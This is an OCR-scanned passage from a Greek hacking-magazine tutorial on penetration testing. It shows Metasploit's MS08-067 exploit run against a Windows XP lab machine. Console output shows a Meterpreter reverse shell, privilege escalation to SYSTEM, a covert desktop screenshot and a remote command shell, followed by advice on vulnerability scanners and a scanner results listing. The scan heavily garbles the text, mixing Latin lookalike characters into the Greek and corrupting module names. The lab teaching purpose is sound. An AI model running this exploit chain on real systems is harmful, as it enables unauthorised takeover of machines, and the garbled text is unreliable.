root@bt:~# ifconfig 

H ανάθεση τιμὴς στην LHOST γίνεται µε TOV αναμενόμενο rpóno: 
msf  exploit(msO8 067 netapi) > set LHOST 192.168.56.133 
LHOST => 192.168.56.133 
msf  exploit(ms08 067 netapi) > show options 


Module options (exploit/windows/smb/ms08 067 netapi): 


Name Current Setting Required Description 

RHOST 192.168.56.139 yes The target address 

RPORT 445 yes Set the SMB service port 
SMBPIPE BROWSER yes The pipe name to use 


(BROWSER, SRVSVC) 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 

EXITFUNC thread yes Exit technique: seh, 
thread, process, none 

LHOST 192.168.56.133 yes The listen address 

LPORT 4444 yes The listen port 


Exploit target: 
Id Name 
0 Automatic Targeting 
Έφτασε η στιγμή nou περιμέναμε! Evepyonoinote ro exploit: 
msf  exploit(ms08 067 netapi) > exploit 
[*] Started reverse handler on 192.168.56.133:4444 
[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX) 
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[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 192.168.56.139 


[*] Meterpreter session 1 opened (192.168.56.133:4444 -> 
192.168.56.139:1344) at 2013-02-14 11:40:03 +0200 


meterpreter > 


Τελειότης! Αφού επιχειρήσαμε την επίθεση, ὀπως βλέπουμε ano την 
ἐξοδο Tou exploit, συνέβησαν τα ακόλουθα: 


ο ξεκίνησε o listener στο μηχἀνημάἁ µας και συγκεκριµένα στο port 
4444 


e εντοπἰστηκε η ακριβἠς ἑκδοση του στόχου 


ο µε εκμετάλλευση της αδυναμίας στην οποία αφορά To exploit, 
εστάλη το payload στο στόχο 


ο TO payload εκτελέστηκε επιτυχώς απὸ το στόχο και φρόντισε va 
συνδεθεί πίσω στο μηχάνημα rou attacker (To BackTrack µας) 


e n σύνδεση επετεύχθη και, πλέον, έχουμε Eva Meterpreter session. 


Βρισκόμαστε στο command prompt rou Meterpreter και λειτουργούμε 
στα πλαίσια του μηχανήματος στὀχου. Δώστε help για ὀλεςτις διαθέσιμες 
EVTOAEG και δοκιμάστε TIG ακόλουθες: 


meterpreter » sysinfo 


Computer : SECDESK 
OS : Windows XP (Build 2600, Service Pack 2). 
Architecture : x86 


System Language : el GR 
Meterpreter : x86/win32 


meterpreter » ipconfig 


Interface 2 


Name : AMD PCNET Family PCI Ethernet Adapter - Packet 
Scheduler Miniport 


Hardware MAC : 08:00:27:67:0e:3d 

MTU : 1500 

IPv4 Address : 192.168.56.139 

IPv4 Netmask : 255.255.255.0 

meterpreter » getsystem 

...got system (via technique 1). 
meterpreter » screenshot 

Screenshot saved to: /root/dEfKRCXz. jpeg 
meterpreter » shell 

Process 3324 created. 


Channel 2 created. 
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Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 
C:\WINDOWS\system32> 


Με την getsystem ο Meterpreter επιχειρε να σας δώσει δικαιώµατα 
υπερχρήστη — και στη συγκεκριμένη περίπτωση τα καταφέρνει. H 
screenshot εἶναι Ιδιαϊτερα διασκεδαστικἠ, µιας κι αποθηκεύει στο 
μηχάνημα rou επιτιθέµενου full-screen screenshots ano το dekstop του 
θύματος. Εξάλλου, µε την shell αποκτἆτε ἑνα πλήρες command shell 
στο unxávnua-oróyo. Πα va ro εγκαταλεἰψετε, πληκτρολογήστε exit. Με 
ἆλλο Eva, κλείνετε και το Meterpreter session. Αν θέλετε να ro ανοίξετε 
ξανά, πληκτρολογήστε και πάλι exploit. Τέλος, για να εγκαταλεἰψετε το 
ms08 067 netapi, δώστε back και θα γυρίσετε στο prompt rou msfcon- 
sole. 


Εντοπισμὀὸς kai κατηγοριοποίηση ευπαθειών 


Ano τα λίγα που εἶδαμε ως ropa, Φαίνεται ξακάθαρα OT! το Metasploit 
εἶναι ἀριστο για τις επιθέσεις αυτές καθ’ αυτὲς, δεν εἶναι όμως ὁ,τι 
καλύτερο για τον εντοπισμὸ ευπαθειών οι οποίες εἶναι δυνατὸν να 
οδηγήσουν στις επιθέσεις. Για τη δουλειἀ αυτή, πολύ πιο κατάλληλοι εἶναι 
οι λεγόμενοι vulnerability scanners. Παραδείγματα τέτοιων εφαρμογών 
εἶναι το Nessus της Tenable Network Security (www.tenable.com/products/ 
nessus) καθώς kai ro Nexpose rn Rapid7, nou ἐχει kal To Metasploit (www. 
rapid7.com/products/nexpose). Eva ano τα δυνατὰ σημεία του Nexpose 
εἶναι ὁτι, αφού ολοκληρώσει την αναζήτηση για ευπάθειες, για κάθε μία 
που βρίσκει πληροφορεί και yia το αν υπάρχει διαθέσιμο exploit module 
στο Metasploit. Σας προτείνουμε να εγκαταστήσετε κι εσεἰς τη δωρεὰν 
εκδοχἠ του Nexpose στο εργαστἠριὀ σας και να κάνετε µια αναζήτηση 
για ευπάθειες. Στο deltaCast 501606 μπορείτε να παρακολουθήσετε και 
την αναζήτηση που κάναμε στο δικὀ µας, EIKOVIKO εργαστἠριο (http:// 
deltahacker.gr/deltacast-s01e06). 


Ano εδώ και n£pa 


Να σημειώσουμε ὁτι τα Metasploit και Nexpose δεν εἶναι κατάλληλα 
μόνο yia τοπικἁ δίκτυα. Μπορείτε κάλλιστα να τα χρησιμοποιήσετε για 
να ελέγξετε Eva site — αρκεἰ να έχετε πάρει ἄδεια ano τον ιδιοκτήτη TOU, 
φυσικὰ. 


Σε πιο ρεαλιστικἁ σενάρια χρήσης, μετράει τρομερά η εμπειρία του 
penetration tester. Πράγματι, πέρα ano τα εργαλεία ο καλὸς pentester 
γνωρίζει ποιες επιθέσεις εἶναι πιθανό να επιφέρουν καρπούς και ποιες OXI, 
πριν καν akoun τις εξαπολύσει! Εξάλλου, στην πράξη εἶναι πολύ niGavó 
να συναντήσει εμπόδια όπως υπερπροστατευτικά firewalls ἡ ευαίσθητα 
antivirus και IDSes. Και γι’ aurà όμως υπάρχουν τρόποι αντιμετώπισης. 


Με τα δύο άρθρα του τεύχους που κρατάτε στα χέρια σας, κάναμε µόνο 
uia µικρή, σύντομη εισαγωγἠ στον κόσμο rou penetration testing, 
naicovrac απὀτην πλατφόρμα rou Metasploit. Το όλο θέμα εἶναι εξαιρετικἁ 
ενδιαφέρον, eire το βλέπει κανεὶς ano τη σκοπιά του επιτιθέµενου eire 
ano εκεἰνη του αμυνόμενου. 


Oa επανἐλθουµε — και OX! µία μόνο φορά ;) 
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Vulnerabilities fù Ἐρ Search 
This page contains a list of all the vulnerabilities affecting your assets. This list is automatically updated with new vulnerabilities as they are discovered. Selecta vulnerability to view information about the vulnerabilities and the affected assets. 


Vulnerabilities by Severity 


@ Critical 


Vulnerability Listing 


Exposures: Á> Susceptible to malware attacks m] Metasploit-exploitable .$. Exploit published 


Title 4G Published on Severity Instances Exceptions 
Default or Guessable SNMP community names: public Wed Jan 01 1997 | Critical o Exclude 
VNC password is "password" Fri Jan 011999 | Critical @ Exclude 
MySQL default account: root/no password E Tue Dec 31 2002 | Critical o Exclude 
Microsoft Server Service / CanonicalizePathName() Remote Code Execution Vulnerability Tue Aug 08 2006 Critical [^] Exclude 
Samba NDR Parsing Heap Overflow Vulnerability 1 Mon May 14 2007 | Critical @ Exclude 
MS08-067: Vulnerability in Server Service Could Allow Remote Code Execution (958644) Thu Oct 23 2008 Critical o Exclude 
PHP Multiple Vulnerabilities Fixed in version 5.2.8 Mon May 05 2008 | Critical Q Exclude 
Tomcat Application Manager Tomcat Tomcat Password Vulnerability Mon Nov 09 2009 Critical ο Exclude 
Buffer overflow in inet network() (CVE-2008-0122) Tue Jan 152008 Critical o Exclude 
PHP Fixed security issue Mon May 05 2008 Critical [^] Exclude 


Showing: 1 to 10 of 303 Rowsperpage| 10 v][«|«][: | of3 [»]m 


Nexpose Security Con... 


Η διαφήμισή σας θα 
μπορούσε va εἶναι εδώ. 


Θα μπορούσε να 'ναι και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν givai. 


Προς το παρόν. 


nex we emcee < EDOUME i EEDETE i 
ξε DOULIE on ξέρετε « npener va κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2usQdeltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (3) 
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